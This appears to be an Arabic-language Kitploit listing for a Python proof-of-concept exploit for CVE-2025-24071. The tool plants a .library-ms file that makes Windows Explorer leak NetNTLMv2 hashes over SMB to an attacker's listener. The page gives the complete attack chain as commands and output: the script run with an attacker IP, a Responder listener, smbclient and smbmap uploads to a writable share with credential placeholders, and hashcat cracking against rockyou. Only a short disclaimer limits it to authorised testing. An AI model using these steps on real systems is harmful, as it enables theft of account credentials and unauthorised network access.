Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PoC-CVE-2025-24071 — أداة إثبات مفهوم بلغة Python للثغرة CVE-2025-24071 تقوم بإنشاء ملف ‎.library-ms‎ لإجبار Windows Explorer على تسريب تجزئات NetNTLMv2 عبر SMB لالتقاطها وكسرها. | Kitploit
أدوات/GitHubGitHub/daemon-404/poc-cve-2025-24071
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالأمن الشبكاتCTFاختبار الاختراقالفريق الأحمرمختبرات وتدريب عملي
GitHubdaemon-404/poc-cve-2025-24071

PoC-CVE-2025-24071

أداة إثبات مفهوم بلغة Python للثغرة CVE-2025-24071 تقوم بإنشاء ملف ‎.library-ms‎ لإجبار Windows Explorer على تسريب تجزئات NetNTLMv2 عبر SMB لالتقاطها وكسرها.

عرض المستودع
منذ 13س 53دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

❀ coerce-library

CVE-2025-24071 — استغلال إجبار NTLM عبر .library-ms (طريقة SMB / TAR)

Theme: Rosé Pine Python: 3.9+ CVE: 2025-24071

Protocol: SMB Capture: NetNTLMv2 Use: Lab / CTF


❀ ما الذي يفعله

يطلب عنوان IP الخاص بالهجوم واسم ملف، ثم يكتب ملف .library-ms يشير إلى \\<IP>\share، ويحزمه داخل exploit.tar. عندما يتصفح Explorer المجلد الذي يصل إليه ملف .library-ms المفكوك، فإنه يحل مسار UNC هذا تلقائيًا ويسرّب NTLMv2 الخاص بالحساب إلى المستمع لديك — دون الحاجة إلى أي نقرة.

⚠️ الملف .library-ms المفكوك هو ما يُفعّل الاستغلال — وليس ملف .tar. ملف .tar الموجود على المشاركة خامل؛ فـ Explorer لا يحلل ملفات tarball. يجب عليك إيصال ملف .library-ms نفسه إلى المشاركة كملف مفكوك. تعتمد طريقة القيام بذلك على الأداة (أدناه).


❀ تشغيله

root@kitploit:~
uv run coerce_library.py      # or: python3 coerce_library.py
root@kitploit:~
Attack IP [10.10.14.197]:
File name [documents]:
[+] documents.library-ms  ->  \\10.10.14.197\share
[+] packed into exploit.tar

❀ ثم

1) الاستماع

root@kitploit:~
sudo responder -I tun0

2) إيصال ملف .library-ms إلى مشاركة قابلة للكتابة

smbclient — ارفع ملف .tar، ثم استخرجه على الخادم باستخدام tar x (مما يُسقط ملف .library-ms المفكوك بجانبه):

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'put exploit.tar; tar x exploit.tar'

smbmap — لا يحتوي على خطوة استخراج، لذا ارفع ملف .library-ms المفكوك مباشرةً (رفع ملف .tar هنا لا يفعل شيئًا — فهو غير قادر على فك ضغطه):

root@kitploit:~
smbmap -H <TARGET> -d <DOMAIN> -u <USER> -p <PASS> --upload exploit.library-ms 'IT/exploit.library-ms'

تأكد من وصوله مفكوكًا على المشاركة:

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'ls' | grep library

3) كسر NTLMv2 الملتقط

root@kitploit:~
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

☧ للاستخدام في اختبارات الاختراق المصرّح بها / CTF / المختبر فقط ☧

تنزيل الأداة